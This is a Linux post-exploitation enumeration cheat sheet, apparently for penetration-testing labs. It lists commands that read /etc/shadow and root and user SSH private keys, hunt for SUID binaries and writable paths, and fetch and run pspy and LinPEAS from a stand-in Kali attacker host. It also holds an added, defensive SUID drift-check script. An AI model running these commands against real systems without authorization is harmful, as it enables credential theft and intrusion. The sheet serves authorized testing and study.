Linux

Interesting Files

cat /etc/passwd
cat /etc/shadow
cat /etc/hosts
ls -la /var/www
ls -la /opt

cat /root/.ssh/authorized_keys
cat /root/.ssh/id_rsa
cat /home/<Username>/.ssh/id_rsa
cat /home/<Username>/.ssh/id_ecdsa
cat /home/<Username>/.ssh/authorized_keys

find / -name config.php -type f 2>/dev/null
find / -name doas.conf -type f 2>/dev/null
find / -name "apache*" -type d 2>/dev/null

find / -name "*.txt" -type f 2>/dev/null
find / -name "*.sh" -type f 2>/dev/null
find / -name ".ht*" -type f 2>/dev/null

find / -name id_rsa -type f 2>/dev/null
find / -name id_ecdsa -type f 2>/dev/null
find / -name authorized_keys -type f 2>/dev/null

find / \( -name "local.txt" -o -name "proof.txt" \) -type f 2>/dev/null

Sudo Things

List the commands the current user is allowed to run

sudo -l

Retrieve sudo version

sudo -V | grep -i "sudo ver"

Run as another user

su - <Username>

System Information

List system information

uname -a

CPU information

lscpu

Disk information

lsblk

USB information

lsusb

Distribution release (login banner)

cat /etc/issue

Network

ss -ntlp

Network details

ip a

Routing table

routel

Hostname

hostname

Environment variables

env

Inspect shell configuration

cat .bashrc

User Roles

Display user identity

id

Display the names of the groups the user belongs to

groups

Crontab

List scheduled cron jobs for current user

crontab -l

Display system wide crontab

cat /etc/crontab

Display all cronjobs

ls -lah /etc/cron.*

Search system log for cron-related activity

grep -i "CRON" /var/log/syslog

Read the cron job content inside the cronjob directory

cat <Cron Job Name>

Special Bits

Find all files on system with SUID bit

find / -perm -u=s -type f 2>/dev/null

Recursively list all files with capabilities set

getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
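
The same SUID search turned into a defender's drift check, as an added example that is not part of the original page: it compares the SUID/SGID files found under a directory with a reviewed baseline list and flags any that group or other can modify. The function names, the baseline format (one path per line) and the demo files are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the original page): SUID/SGID drift check.
# Assumed baseline format: one absolute path per line.

# List set-uid or set-gid regular files under $1, sorted for comm(1).
suid_scan() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
        LC_ALL=C sort
}

# Print files found under $1 that are missing from the baseline list $2.
suid_drift() {
    current=$(mktemp) || return 2
    suid_scan "$1" > "$current"
    # comm -13 keeps lines that appear only in the second input.
    LC_ALL=C sort "$2" | LC_ALL=C comm -13 - "$current"
    rm -f "$current"
}

# Print SUID/SGID files under $1 that group or other may modify.
suid_writable() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        \( -perm -0020 -o -perm -0002 \) 2>/dev/null | LC_ALL=C sort
}

# Constructed demo tree: one reviewed helper, one unreviewed writable binary.
demo=$(mktemp -d)
: > "$demo/reviewed-helper"; chmod 4755 "$demo/reviewed-helper"
: > "$demo/new-tool";        chmod 4775 "$demo/new-tool"
: > "$demo/notes.txt"
printf '%s\n' "$demo/reviewed-helper" > "$demo/baseline.list"

echo "Not in baseline:";         suid_drift "$demo" "$demo/baseline.list"
echo "Writable by group/other:"; suid_writable "$demo"
rm -rf "$demo"
```

On a real host, build the baseline once from a known-good install with suid_scan / and review every path that suid_drift reports afterwards.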

Writable Directories

Find all directories the current user can write to

find / -writable -type d 2>/dev/null

Catch Repeating Processes

Monitor specific processes in real time

watch -n 1 "ps aux | grep -i <Keyword>"
while sleep 1; do ps aux | grep -i <Keyword>; done

Monitor Processes with PsPy

On Kali

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

On Target Machine

Retrieve the application from Kali

wget http://<Kali IP Address>/pspy64 && chmod +x pspy64

Run the application

timeout 61s ./pspy64

Reading Binaries

strings <File Name>

LinPeas

On Target Machine

Retrieve the application from Kali

wget http://<Kali IP Address>/linpeas.sh && chmod +x linpeas.sh

Run the application

./linpeas.sh
